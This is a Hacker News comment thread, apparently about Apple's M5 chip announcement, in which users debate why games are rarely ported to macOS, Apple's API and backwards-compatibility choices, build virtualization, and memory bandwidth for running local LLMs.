            I think the past bit people, but unlike the PS4 transition or gaming consoles in the past (which were rarely backwards compatible), there wasn't enough cultural momentum to plow through it... leaving "don't support Apple" as a bit of a institutional memory at this point, even though the odds of another transition seem almost nonexistent. What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

            • coldpie 8 hours ago

              Yeah, I buy that, so I think we are actually agreeing with each other. The very rough backwards support story Apple has had for the past decade, which I mentioned, has made people uninterested in supporting the platform, even if they're better about it now, as you claim (though I'm unconvinced about that personally, having worked on macOS software for more than a decade).

              > What would it even be? 128 bit? Back to x86? Notarization++? Metal 4 incompatible with Metal 1?

              Sure, I can think of lots of things. Every macOS update when I worked in this space broke something that we had to go fix. Code signature requirements change a bit in almost every release, not hard to imagine a 10-year-old game finally running afoul of some new requirement. I can easily see them removing old, unmaintained APIs. OpenGL is actively unmaintained and I would guess a massive attack vector, not hard to see that going away. Have you ever seen their controller force feedback APIs? Lol, they're so bad, it's a miracle they haven't removed those already.

            • bigyabai 5 hours ago

              > even though the odds of another transition seem almost nonexistent.

              You see, the existence of that "almost" is already less confidence than developers have on every game console as well as Linux and Windows.

        • jolux 7 hours ago

          > I've heard this argument, but it also doesn't pass the sniff test in 2025.

          I mean, it's at least partially true. I used to play BioShock Infinite on my MacBook in high school, there was a full port. Unfortunately it's 32 bit and doesn't run anymore and there hasn't been a remaster yet.

    • littlecranky67 8 hours ago

      I don't buy it either, because Apples GPTK works similar as Proton - they have a DX12-to-Metal Layer that works quite well - if it works. And their GPTK is based on wine, just as proton. It is more other annoyances like lack of steam support. There are patched version of steam circulating that run in GPTK though (offline mode) but that is where everything gets finnicky and brittle. It is mostly community efforts, and I think gaming could be way better on Apple if they embrace the Proton-approach that they started with GPTK.

      • ldoughty 7 hours ago

        Apple collects no money from Steam sales, so they don't see a reason to support it.

        You don't buy Apple to use your computer they way you want to use it. You buy it to use it the way they tell you to. E.g. "you're holding it wrong" fiasco.

        In some ways this is good for general consumers (and even developers, with limited config comes less unpredictablilty)... However this generally is bad for power users or "niche" users like Mac gamers.

        • littlecranky67 7 hours ago

          > Apple collects no money from Steam sales, so they don't see a reason to support it.

          That is true, but now they are in a position where their hardware is actually more affordable and powerful than their Windows/x86 counterpart - and Win 11 is a shitload of adware and an annoyance in itself, layered ontop of a OS. They could massively expand their hardware sales to the gaming sector.

          I'm eyeing at a framework Desktop with an AMD AI 395 APU for gaming (I am happy with just 1080p@60) and am looking at 2000€ to spend, because I wan't a small form factor. Don't quote me on the benchmarks, but a Mac Mini on M4 Pro is probably cheaper and more powerful for gaming - IF it had proper software support.

        • raw_anon_1111 7 hours ago

          Apple collects no money from Photoshop, Microsoft, or anything else that runs on the Mac besides the tiny minority of apps sold on the Mac App Store.

          Not to mention many subscription services on iOS that don’t allow you to subscribe through the App Store.

    • kllrnohj 6 hours ago

      PlayStation, Nintendo, and Xbox all have 10s of millions of gamers each. Meanwhile MacOS makes up ~2% of steam users which is probably a pretty good proxy for the number of MacOS gamers.

      Why would I do anything bespoke at all for such a tiny market? Much less an entirely unique GPU API?

      Apple refusing to support OpenGL and Vulkan absolutely hurt their gaming market. It increased the porting costs for a market that was already tiny.

      • littlecranky67 4 hours ago

        > Why would I do anything bespoke at all for such a tiny market?

        Because there is a huge potential here to increase market share.

  • SigmundA 8 hours ago

    Yep, I use Moonlight / Sunshine / Apollo to stream from my gaming PC, so I still use my Mac setup but get nearly perfect windows gaming with PC elsewhere in house.

    This has been by far the best setup until Apple can take gaming seriously, which may never happen.

anuraj 42 minutes ago

Too underwhelming. Apple under Tim Cook has been running out of steam. What prevents Apple from having 100s of GPU cores and higher memory bandwidth? They need to catch the AI wave before they perish under it.

  • pertymcpert 37 minutes ago

    What are you talking about? People love Macs for running local LLMs.

    • hu3 3 minutes ago

      For real work tho? My colleagues couldn't get past toy demos.

      And it ruins battery life.

      For coding it's on par with GPT3 at best which is amateur tier these days.

      It's good for text to speech and speech to text but PCs can do that too.

ironman1478 6 hours ago

It's surprising to me macs aren't a more popular target for games. They're extremely capable machines and they're console-like in that there isn't very much variation in hardware, as opposed to traditional PC gaming. I would think that it's easier to develop a game for a MacBook than a Windows machine where you never know what hardware setup the user will have.

  • shantara 6 hours ago

    The main roadblock for porting the games to Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it‘s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

    And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

    • coffeeaddict1 6 hours ago

      > an absolutely ancient OpenGL version

      I still don't get this. Apple is a trillion dollar company. How much does it cost to pay a couple of engineers to maintain an up to date version on top of Metal? Their current implementation is 4.1, it wouldn't cost them much to provide one for 4.6. Even Microsoft collaborated with Mesa to build a translation on top of dx12, Apple could do the same.

      • astrange 3 hours ago

        They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.

        • coffeeaddict1 2 hours ago

          > They can't do Khronos things because they don't get along with Khronos.

          Has anyone figured out what exactly the crux of their beef? OpenGL 4.1 came out in 2010, so surely whatever happened is settled by now.

      • mandarax8 4 hours ago

        Their current OpenGL 4.1 actually does run on top of metal making it even more blatantly obvious that they just don't want to.

    • zarzavat 2 hours ago

      Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, thus rug pulling every game built on top of it.

      It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

    • ryandrake 5 hours ago

      The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

      1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

      • astrange 3 hours ago

        It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

        Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

        Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

    • astrange 6 hours ago

      > If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

      IIRC developers literally got 15 years of warning about that one.

      • ascagnel_ 5 hours ago

        Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.

      • bigyabai 5 hours ago

        IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...

        • astrange 5 hours ago

          Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

          But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

          • Rohansi an hour ago

            Another big, non-technical reason is most games make most of their money around their release date. Therefore there is no financial benefit to updating the game to keep it working. Especially not on macOS where market share is small.

          • bigyabai 2 hours ago

            > But it's not possible to keep maintaining 32-bit forever.

            Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

            Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

  • lazypenguin 6 hours ago

    As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

    As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

    • jjtheblunt 6 hours ago

      for games, how would you test in a VM, when games so explicitly want direct hardware access?

      i am obviously misunderstanding something, i mean.

      • zulban 5 hours ago

        I run Linux and test my Windows releases on a VM. It works great.

        Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

        Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

      • lazypenguin 2 hours ago

        I develop a game that easily runs on much weaker hardware and runs fine in a VM, I would say most simple 3D & 2D games would work fine in a VM on modern hardware.

        However, these days it's possible pass-through hardware to your VM so I would be able to pass through a 2nd GPU to MacOS...if it would let me run it as a guest.

      • Liquix 2 hours ago

        on linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed through resources from the host and provides near-native performance.

    • neogodless 6 hours ago

      I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

      Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows. Especially for consoles like XBOX One or newer, and PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

      Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

      • lazypenguin 2 hours ago

        Basically you are correct, MacOS has to be treated like a console in that way. Except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platform, can't say the same for MacOS.

        For testing, I can do a large amount of testing in a VM for my game. Maybe not 100% and not full user testing but nothing beats running on the native hardware and alpha/beta with real users.

        Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

      • throwuxiytayq 6 hours ago

        > Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

        I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

        Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

    • whatever1 6 hours ago

      You do it for Xbox and PlayStation and Nintendo.

    • cesarvarela 6 hours ago

      I'm sure you literally purchased Nvidia hardware for game development.

      • stronglikedan 5 hours ago

        A component is much cheaper than an entire dedicated system (which would of course contain a similar component).

        • cesarvarela 2 hours ago

          I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.

  • jajuuka 2 hours ago

    Multiple solid reasons have been mentioned from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is the lack of marketshare. Macos market is just tiny and very limited. It's also not a growing market. PC gaming isn't blowing up either but the amount of players is just simply higher.

    Ports to macos have not done well from what I've heard. However you can see ports on PC do really well and have encouraged studios like Sony and SquareEnix to invest more in PC ports. Even much later after the console versions sell well. Just not a lot of reasons to add the tech debt and complexity of supporting mac as well.

    Even big publishers like Blizzard who have been mac devs for a long time axed the dedicate mac team and client and moved to a unified client. This has downfalls like mac specific issues. If those are not critical then they get put in the pile with the rest of the bugs.

  • jayd16 6 hours ago

    Mac dev sucks. You're forced to use macos and xcode (for the final build anyway). You're not able to virtualize the build machines.

    Apple is actively hostile to how you would build for Linux or PC or console.

    • matthew-wegner 6 hours ago

      > You're not able to virtualize the build machines.

      Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

      /System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

      Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.

      macOS 26 is the last major version to support Intel, so once macOS 28 is latest this will probably become impossible (macOS 26 should be able to use Xcode 27, but maybe the platform removal will change this previous year's OS support from continuing).

      • GTP 6 hours ago

        > Apple still ships a bunch of virtualization drivers in macOS itself.

        I think OP means virtualizing on something that isn't Apple.

      • jayd16 6 hours ago

        Interesting. The last I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

        You can get an xcode building for arm Macs on PC hardware with this?

    • nasseri 6 hours ago

      This is simply not the case. Every major game framework/engine targets Mac natively.

      If you are building your engine/game from scratch, you absolutely do not need to use Xcode

      • jayd16 6 hours ago

        Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and xcode.

        • nasseri 6 hours ago

          I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with

        • nasseri 6 hours ago

          Yea you’re right I skipped over the part where you said the final build required it.

          Nonetheless that’s a small fraction of the time spent actually developing the game.

          • jayd16 6 hours ago

            Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

            That makes it a continuous headache to keep your Mac builders up.

            It means you need to double dev hardware costs or more as you need a gaming PC to target your core audience and Macs handle the mac bugs.

            It means your mac build machines are special snowflakes because you can't just use VMs.

            The list goes on and on of Mac being actively hostile to the process.

            Just Rider running on a Mac is pleasant sure, but that's not the issue.

    • coldtea 6 hours ago

      >Mac dev sucks. You're forced to use macos and xcode (for the final build anyway)

      Having to use xcode "for the final build" is irrelevant to the game development experience.

      • jayd16 6 hours ago

        If you're an indie with just PC hardware it sure as hell matters.

  • leshenka 6 hours ago

    I was very surprised, and pleasantly too, that Cyberpunk 2077 can maintain 60FPS (14", M4 Pro, 24gb RAM) with only occasional dips. Not with full resolution (actually around FullHD), but at least without "frame generation". Turning frame generation on, it now can output 90-100 FPS depending on environment, but VSync is disabled so dips become way more noticeable.

    It even has "for this mac" preset which is good enough that you don't need to tinker with settings to have decent experience.

    The game is paused, almost like becomes "frozen" if it's not visible on screen which helps with battery (it can be in the background without any noticeable impact on battery and temperature). Overall way better experience than I expected.

  • mavbo 5 hours ago

    I play a lot of World of Warcraft on my M3 MacBook Pro which has a native MacOS build. It's a CPU bottlenecked game with most users recommending the AMD X3D CPUs to achieve decent framerates in high end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise for hours at a time on battery. It's been night and day compared to previous Windows machines.

  • sosodev 6 hours ago

    It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.

    • hangonhn 6 hours ago

      I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.

      • amluto 5 hours ago

        The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

        Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

        • ascagnel_ 5 hours ago

          The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

          More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

          It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

  • Damogran6 6 hours ago

    There's a cost/value calculation that just doesn't work well...I have a Ryzen9/rtx3070 PC ($2k over time) and my M4 Mini ($450) holds it's own for most all normal user stuff...sprinting ahead for specific tasks (Video CODEC)...but the 6 year old dedicated GPU on the PC annihilates the Mini in pushing pixels...You can spec an Apple that does better for gaming, but man, are you gonna pay for it, and still not keep up with current PC GPUS.

    Now...something like minecraft or SubNautica? The M4 is fine, especially if you're not pushing 4k 240hz.

    Apple has been pushing the gaming experience for years (iPhone 4s?) but it never REALLY seems to land, and when someone has a great gaming seperience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

  • LtdJorge 6 hours ago

    Metal is a very recent API compared to DirectX and OpenGL. Also, there’s very very little people on Mac, and even less that also play videogames. There are almost no libraries and tooling built around Metal and the Mac SDKs, and a very small audience, so it doesn’t make financial sense.

  • viktorcode 4 hours ago

    The porting is not straightforward; you must switch to Metal, you should adapt rendering pipeline to tiled deferred shading.

  • spogbiper 6 hours ago

    you have to release major titles for windows and console, because there are tons of customers using them.

    so a mac port, even if simple, is additional cost. there you have the classic chicken and egg problem. the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. and as long as they do, gamers ignore the platform

    i've seen it suggested that Apple could solve this standoff by funding the ports, maybe they have done this a few times. but Apple doesn't seem to care much about it

  • GTP 6 hours ago

    Up to some years ago, it was common for gamers to assemble their own PC, something that you can't do with a Mac. Not sure if this is still common among gamers though.

    • LarsDu88 4 hours ago

      The advent of silicon interposer technology has made modular memory and separate CPU/GPU soon to be obsolete IMO

      The communication bandwidth you can achieve by putting CPU, CPU, and memory together at the factory is much higher than having these components separate.

      Sad for enthusiasts, but practically inevitable

  • ikamm 6 hours ago

    - have to build using XCode on macOS

    - have to pay Apple to have your executable signed

    - poor Vulkan support

    The hardware has never been an issue, it's Apple's walled garden ecosystem.

  • ProfessorZoom 6 hours ago

    i think it depends on how easy it is for a dev to deploy to apple. M1 was great at running call of duty in a windows emulator. iPhone can run the newest resident evil. apple needs to do more to convince developers to deploy to mac

  • croes 5 hours ago

    Doesn’t MacOS favor an 60Hz output? Gamers prefer much higher rates.

    And don’t forget they made an VR headset without controllers.

    Apple doesn’t care about games

    • jsheard 5 hours ago

      > Doesn’t MacOS favor an 60Hz output?

      Kind of? It does support higher refresh rates, but their emphasis on "Retina" resolutions imposes a soft limit because monitors that dense rarely support much more than 60hz, due to the sheer bandwidth requirements.

  • yieldcrv 5 hours ago

    It's kind of a myth though, Mac has many flagship games and everything in between

    If you identify as a "gamer" and are in those communities, then you'll see communities talking about things you can't natively play

    but if you leave niches you already have everything

    and with microtransactions, Apple ecosystem users are the whales. again, not something that people who identify as "gamers" wants to admit being actually okay with, but those people are not the revenue of game production.

    so I would say it is a missed opportunity for developers that are operating on antiquated calculations of MacOS deployment

    • bigyabai 2 hours ago

      > It's kind of a myth though

      It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

      macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

      If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

zhyder an hour ago

"complementing the Neural Accelerators in the CPU and GPU" seems to be a misprint; I don't believe they have the accelerators in the CPU too.

Still super interesting architecture with accelerators in each GPU core _and_ a dedicated neural engine. Any links to software documentation for how to leverage both together, or when to leverage one vs the other?

mattray0295 5 hours ago

They push these new generations out so quick, and with crazy performance boosts. Impressive

  • elric 2 hours ago

    Meanwhile intel seems to be doing a big bunch of nothing much. And AMD seems busy playing house with OpenAI to catch up to nvidia on the GPU front.

    Now if only Apple would sell these for use outside of their walled garden.

jtrn an hour ago

No wifi 7. No 5g. No 16". No upgrade to Max ram. No upgrade to screen. No Bluetooth 6. No upgrade for me. I’ll stay with my M1 Max for now.

  • _zoltan_ 44 minutes ago

    you're comparing your M1 Max with the base model M5, not M5 Max. chill. it will come.

vardump 8 hours ago

I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.

elnatro 44 minutes ago

I don’t understand why they don’t advertise this cpu as one capable of running local LLMs, because it can, right?

mrkaluzny 37 minutes ago

Emm… why it says that a charger is not included on the purchase. That’s just crazy.

anteloper 2 hours ago

I can't find a single moore's law chart that includes 2025 data (they all seem to cut off around 2020 actually).

Does anyone know if we're still on pace with Moore's law?

h1fra 8 hours ago

I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for this platform. I guess it benefits a whole range of software, not just games, but still that's a pity.

  • tantalor 8 hours ago

    Because gaming on Mac actually looks bad in practice.

    https://news.ycombinator.com/item?id=44906305

    • qnpnp 5 hours ago

      This is easy to fix, not an explanation.

      Gaming on mac is indeed lacking, but that's really not the reason.

      • tantalor 4 hours ago

        It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.

t1234s 3 hours ago

Any reason they don't have an apple TV pro with an M* chip that's targeted towards gaming?

  • quentindanjou 3 hours ago

    I think it is because there are not enough games to be the reason for integrating an M* chip.

    • boogieknite 2 hours ago

      probably right but on the other hand Apple is willing to throw mountains of $ at tv+ productions just to get ppl on their platform

      an economist could probably tell me why portioning some of that money to spend on game port budget isnt valuable. gamepass seems ripe to be undercut too

reacharavindh 7 hours ago

One that’s be a nice quality of life improvement in MacBook(Air/Pro) is built-in 5G connectivity. I’d spring for that convenience not needing to connect to a hotspot draining precious battery on my phone. I thought we were closer given Apple started making their own modems, but it is still a miss.

  • port3000 5 hours ago

    They want you to buy the Apple phone and pair it, so they sell more

perdomon an hour ago

It's kind of crazy that they insist on doing basically one of these every year. A lot of people complain that the iPhone stopped changing (meaningfully) between updates several years back. I think Apple Silicon is bound to be the same. I will say that the M4 Mac Mini was groundbreaking in terms of a budget-friendly Apple product -- I hope they recognized why it was loved and continue to iterate in that direction.

umvi 2 hours ago

I would buy a mac mini with an M* chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit

thomascountz 24 minutes ago

Imagine Apple released a laptop that shipped without MacOS. Just the hardware, drivers, and the integrated M-series chips.

   The MacBook Zero
textlapse 3 hours ago

I wonder how much of the nVidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; M5 MBP has higher performance with a monitor attached and with a (bit) lower price tag.

If you could yank the screen out, it probably evens out :)

I have seen quite a few such announcements from competitors that tend to be so close that I wonder if they have some competitor analysis to precede the Goliath by a few days (like Google vs rest, Apple vs rest etc).

heystefan 8 hours ago

Is it me or did they use to avoid calling it "AI"?

  • simonw 8 hours ago

    Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

    Also just noticed this:

    "And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

    First time I've ever heard of webAI - I wonder how they got themselves that mention?

    • rgo 6 hours ago

      > First time I've ever heard of webAI - I wonder how they got themselves that mention?

      I wondered the same. Went into Crunchbase and found out Crunchbase are now fully paywalled (!), well saw that coming... Anyway, hit the webAI blog, apparently they were showcased at the M4 Macbook Air event in 2024 [1] [2]:

      > During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

      My guess is this was the best LLM use-case Apple could dig-up for their local-first AI strategy. And Apple Silicon is the best hardware use-case webAI could dig-up for their local-first AI strategy. As for Apple, other examples would look too hacky, purely dev-oriented and depend on LLM behemoths from US or China. Ie "try your brand-new performant M5 chip with LM Studio loaded with China's Deepseek or Meta's Llama" is an Apple exec no-go.

      1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

      2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

thurn 8 hours ago

No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.

allenrb 4 hours ago

I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

  • wina 4 hours ago

    why do you want more CPU cores and better performance than the M4, if not for running local AI models?

    • Remnant44 3 hours ago

      Essentially ever other use case for a computer.

      Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

    • sib 3 hours ago

      Photo & video post-processing...

    • adastra22 4 hours ago

      COU cores aren’t relevant to running AI?

GeekyBear 6 hours ago

I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

  • bigyabai 5 hours ago

    I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

    It's an improvement, nomenclature-wise.

gmm1990 8 hours ago

Interesting that there's only the m5 on the macbook pro. I thought the m4 and m4 pro/max were at the same time on the macbook pro

apatheticonion 30 minutes ago

Wake me up when I can play video games on my MacBook and I'll upgrade my MacBook M1 Pro.

Until then, I take a mini PC with me along with my M1 when I travel and use game streaming for gaming and offload dev and AI work via ssh + ssh remote tools.

To me, M5 has amazing hardware, but they put square wheels on a Ferrari

gzer0 8 hours ago

M5 Chip currently only avaialble with up to 32 GB of RAM on the 14 inch Macbook pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

  • pixelpoet 7 hours ago

    That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!

    • hannesfur 7 hours ago

      As pointed out in other places as well a better comparison will be the upcoming Pro & Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference not the little AI accelerator AMD has put on there. That one is just to limited.

    • Tepix 7 hours ago

      So you're saying these won't sell at all?

      • pixelpoet 6 hours ago

        I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

        I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by mem capacity and bandwidth.

newman8r 2 hours ago

What's sad is there's still no asahi support for m4. I have one and I barely ever use it for that reason.

aetherspawn 2 hours ago

Wish boot camp was free again… sick of paying for parallels.

alberth 7 hours ago

Vision Pro went from M2 to M5, that's quite a jump in horse-power.

  • adamschwartz 5 hours ago

    Also ~200g heavier due in part to the counterweight in the new strap.

sebastianconcpt 8 hours ago

Wonder how it compares with the M4 Max that I've just bought haha

  • dmix 7 hours ago

    Same I just bought an M4 Max 2 weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released M5 Max yet

    • sebastianconcpt 7 hours ago

      It's going to be fine, what's important is what we do with the thingy :)

      Logos is King

maxk42 6 hours ago

For my use case I need MSL to support fp64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s and they're not producing something I can use to even tinker with AI with in my spare time. Apple has lost the AI war before it even got started IMO.

criddell 7 hours ago

I wish I could get the nano texture glass on a lower spec iPad Pro. I probably only need the 512 GB model and the glass is only available on 1 and 2 TB modes.

tonyhart7 17 minutes ago

never see the day that I would say that Apple device is one of the best to run LLM

jon-wood 8 hours ago

> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

  • asdhtjkujh 7 hours ago

    Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental — selling outdated hardware that will become obsolete sooner is not more environmentally-friendly.

    Hardware longevity and quality are probably the least valid criticisms of the current Macbook lineup. Most of the industry produces future landfill at an alarming rate.

  • Cthulhu_ 7 hours ago

    I'm always skeptical about these carbon neutral pledges because in practice it's a lot of administrative magic, like paying a company that says they will plant trees or whatever which will sign some official looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

    And it's things like not including a charger, cable, headphones anymore to reduce package size, which sure, will save a little on emissions but it's moot because people will still need those things.

  • SG- 7 hours ago

    second hand Apple market is very big, especially since M series MacBooks leapfrogged performance.

zoobab 8 hours ago

Does it run Linux?

rcarmo 5 hours ago

I'll take one inside an iPad mini, thank you very much.

pzo 5 hours ago

This is quite weird move and confusing (probably on purpose). This chip M5 is released in Macbook PRO but previous macbook pro had M4 Pro or M4 Max so their more like macbook air series to even like ipad pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4" but my old Macbook M2 Max have 400GB/s

ChuckMcM 3 hours ago

I think it would be amazing to be able to buy an M5 based open platform.

jbjbjbjb 8 hours ago

I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.

benjaminclauss 8 hours ago

Despite the flak Apple gets, there M-series continues to impress me as I learn more about hardware.

jasoneckert 8 hours ago

With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.

nblgbg 7 hours ago

32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.

randomtoast 8 hours ago

A unified memory bandwidth of 1,224 gigabits per second is quite impressive.

  • vardump 8 hours ago

    Probably gigabytes (GB) and not gigabits (Gb)?

    Edit: gigabits indeed. Confusing, my old M2 Max has 400 GB/s (3200 gigabits per second) bandwidth. I guess it's some sort of baseline figure for the lowest end configuration?

    Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.

  • mihau 8 hours ago

    why? M3 Ultra already had 800 GB/s (6400 gbps) memory bandwidth

    • NetMageSCW 8 hours ago

      But what did the base M3 have? Why compare to different categories?

      Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

    • sapiogram 8 hours ago

